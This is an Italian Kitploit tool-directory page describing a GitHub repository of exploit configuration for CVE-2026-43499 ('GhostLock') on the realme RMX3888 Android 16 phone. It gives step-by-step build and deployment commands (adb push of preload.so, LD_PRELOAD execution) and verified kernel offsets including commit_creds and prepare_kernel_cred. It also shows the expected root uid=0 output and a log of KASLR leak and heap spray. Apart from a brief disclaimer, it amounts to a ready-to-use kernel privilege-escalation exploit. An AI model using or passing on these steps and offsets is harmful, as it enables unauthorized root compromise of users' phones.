Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
rmx3888-cve-2026-43499-config — CVE-2026-43499 configurazione dell'exploit per realme RMX3888 (Android 16) - 20 offset del kernel verificati | Kitploit
Strumenti/GitHubGitHub/bailan766/rmx3888-cve-2026-43499-config
Sicurezza AndroidAnalisi delle VulnerabilitàExploitSicurezza MobileApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHubbailan766/rmx3888-cve-2026-43499-config

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

rmx3888-cve-2026-43499-config

CVE-2026-43499 configurazione dell'exploit per realme RMX3888 (Android 16) - 20 offset del kernel verificati

Vedi Repository
52121 mese faNon ancora revisionato

Configurazione dell'Exploit CVE-2026-43499 per realme RMX3888

Informazioni sul Dispositivo

  • Marca/Modello: realme RMX3888
  • Versione Android: 16 (SDK 36)
  • Build ID: BP2A.250605.015
  • Kernel: Linux 6.1.141-android14-11-o-gffc54a6d2287
  • SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
  • Architettura: ARM64 (aarch64)

Panoramica

Questo repository contiene i file di configurazione completi per l'exploit CVE-2026-43499 (GhostLock) che ha come target il dispositivo realme RMX3888. Tutti gli offset del kernel sono stati estratti e verificati dal boot.img del dispositivo.

Funzionalità

✓ 20 offset del kernel verificati estratti da vmlinux
✓ Logging in tempo reale con O_SYNC + fsync per la sicurezza in caso di kernel panic
✓ Configurazione specifica per il dispositivo RMX3888
✓ Script di compilazione con un clic con rilevamento automatico dell'NDK
✓ Documentazione completa con guide alla compilazione

File Inclusi

File di Configurazione

  • arget.h - Offset del kernel specifici per il dispositivo (20 offset verificati)
  • common.h - Configurazione di compilazione con integrazione del logging

ealtime_log.h - Implementazione del logging in tempo reale

Documentazione

  • BUILD_GUIDE.md - Guida completa alla compilazione

eport.md - Rapporto di analisi dettagliato (Round 1)

ound2_report.md - Rapporto di configurazione (Round 2)

  • ROUND2_STATUS.md - Riepilogo dello stato di esecuzione
  • compile_status.json - Stato di compilazione leggibile da macchina

Script

  • compile_rmx3888.sh - Script di compilazione con un clic

Avvio Rapido

Prerequisiti

  • Android NDK r26d o successivo
  • Ambiente Git Bash, Linux/WSL o Termux

Compilazione

root@kitploit:~
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh

Su Windows Git Bash, lo script rileva automaticamente il percorso SDK predefinito utilizzato da Android Studio e dagli strumenti da riga di comando: /c/Android/Sdk/ndk/*.

Nota: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL e COPY_SPLICE_READ utilizzano attualmente fallback compatibili con la compilazione nell'header del target RMX3888. Sostituiscili con gli offset vmlinux RMX3888 verificati prima di fare affidamento sul comportamento a runtime.

Utilizzo

root@kitploit:~
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/

# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so

# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id

# Check logs
adb shell cat /sdcard/Download/log_*.txt

Offset Principali

Gli offset principali riportati di seguito sono stati estratti dal kernel 6.1.141. Consulta la nota precedente per le voci di fallback compatibili con la compilazione che richiedono ancora una verifica specifica per RMX3888.

root@kitploit:~
#define KIMAGE_TEXT_BASE        0xffffffc008000000ULL
#define INIT_TASK_OFF           0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF         0x0126bbe0ULL
#define COMMIT_CREDS            0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED     0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets

Funzionalità di Logging

Il modulo di logging in tempo reale integrato fornisce:

  • Percorso di log primario: /sdcard/Download/log_.txt
  • Percorso di fallback: /data/local/tmp/log_.txt
  • Sicuro contro il kernel panic: utilizza O_SYNC + fsync() per la scrittura immediata su disco
  • Voci con timestamp: tutte le voci di log includono timestamp precisi
  • Mirror su stderr: i log vengono inoltre emessi su stderr per adb logcat

Risultati Attesi

Sfruttamento Riuscito

uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...

Output del File di Log

` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt

[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `

Risoluzione dei Problemi

Consulta BUILD_GUIDE.md per istruzioni dettagliate sulla risoluzione dei problemi, tra cui:

  • Errori di compilazione
  • Crash a runtime
  • Problemi di bypass di KASLR
  • Blocchi delle policy SELinux

Avviso di Sicurezza

⚠️ AVVERTENZA: questa configurazione è destinata esclusivamente alla ricerca sulla sicurezza autorizzata.

  • Utilizza solo su dispositivi di tua proprietà
  • Non distribuire binari compilati senza autorizzazione
  • Rispetta le pratiche di divulgazione responsabile
  • I file di log possono contenere informazioni di sistema sensibili

Dettagli Tecnici

Processo di Estrazione

  1. Boot.img decompresso tramite il parser Android Boot Image v4
  2. vmlinux estratto tramite vmlinux-to-elf (102.871 simboli)
  3. 99.580 simboli validi analizzati ed esaminati
  4. 20 offset critici convalidati in modo incrociato
  5. Verifica degli offset tramite controlli di coerenza degli indirizzi dei simboli

Verifica degli Offset

  • Indirizzo base del kernel confermato: 0xffffffc008000000
  • Tutti gli indirizzi dei simboli validati rispetto al layout di memoria
  • Riferimenti incrociati con il dispositivo di riferimento (Google Pixel tokay)
  • Tasso di successo di estrazione del 100% (20/20 offset)

Riferimenti

  • CVE-2026-43499: GhostLock - Vulnerabilità UAF nell'allocatore Ion
  • Sorgente dell'Exploit: https://github.com/NebuSec/CyberMeowfia
  • Dispositivo Target: realme RMX3888 (Snapdragon 8 Gen 3)

Licenza

Questa configurazione è fornita esclusivamente per scopi educativi e di ricerca sulla sicurezza.

Esclusione di Responsabilità

Questo repository contiene materiali di ricerca sulla sicurezza. Gli autori e i contributori non sono responsabili per qualsiasi uso improprio o danno causato da questo codice. Utilizzalo a tuo rischio e pericolo e solo su dispositivi di tua proprietà o per i quali disponi di esplicita autorizzazione al test.


Generato: 2026-07-23
Versione del Kernel: 6.1.141-android14-11-o-gffc54a6d2287
Verifica degli Offset: 100% (20/20)
Stato: Pronto per la compilazione

Scarica lo strumento